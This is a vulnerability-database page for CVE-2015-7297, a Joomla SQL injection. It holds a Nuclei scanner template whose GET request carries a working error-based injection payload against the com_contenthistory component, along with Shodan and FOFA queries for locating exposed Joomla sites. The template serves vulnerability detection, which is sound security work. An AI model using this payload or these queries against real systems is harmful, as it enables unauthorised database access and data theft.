Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-7297
HistoryApr 07, 2021 - 4:52 p.m.

Joomla! Core SQL Injection

2021-04-0716:52:11
ProjectDiscovery
github.com
7
joomla
sql injection
cve-2015-7297
packetstorm
data leakage
unauthorized access
security patches

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.8

Confidence

Low

EPSS

0.975

Percentile

100.0%

A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.

id: CVE-2015-7297

info:
  name: Joomla! Core SQL Injection
  author: princechaddha
  severity: high
  description: A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Joomla! CMS.
  remediation: |
    Apply the latest security patches and updates provided by Joomla! to mitigate the SQL Injection vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2015-7297
    - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
    - https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/
    - http://packetstormsecurity.com/files/134097/Joomla-3.44-SQL-Injection.html
    - http://packetstormsecurity.com/files/134494/Joomla-Content-History-SQL-Injection-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2015-7297
    cwe-id: CWE-89
    epss-score: 0.97553
    epss-percentile: 0.99997
    cpe: cpe:2.3:a:joomla:joomla\!:3.2.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joomla
    product: joomla\!
    shodan-query:
      - http.html:"joomla! - open source content management"
      - http.component:"joomla"
      - cpe:"cpe:2.3:a:joomla:joomla\!"
    fofa-query: body="joomla! - open source content management"
  tags: cve2015,cve,packetstorm,joomla,sqli
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"

    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'
# digest: 4a0a0047304502202a08577111f012e59c2108d9e51684c5329449907081587b4e4d76abd3406739022100dbd68ec0f6ae6c4a6f6109fd123ff073d882103a02608a2c05b2e034addebccb:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.8

Confidence

Low

EPSS

0.975

Percentile

100.0%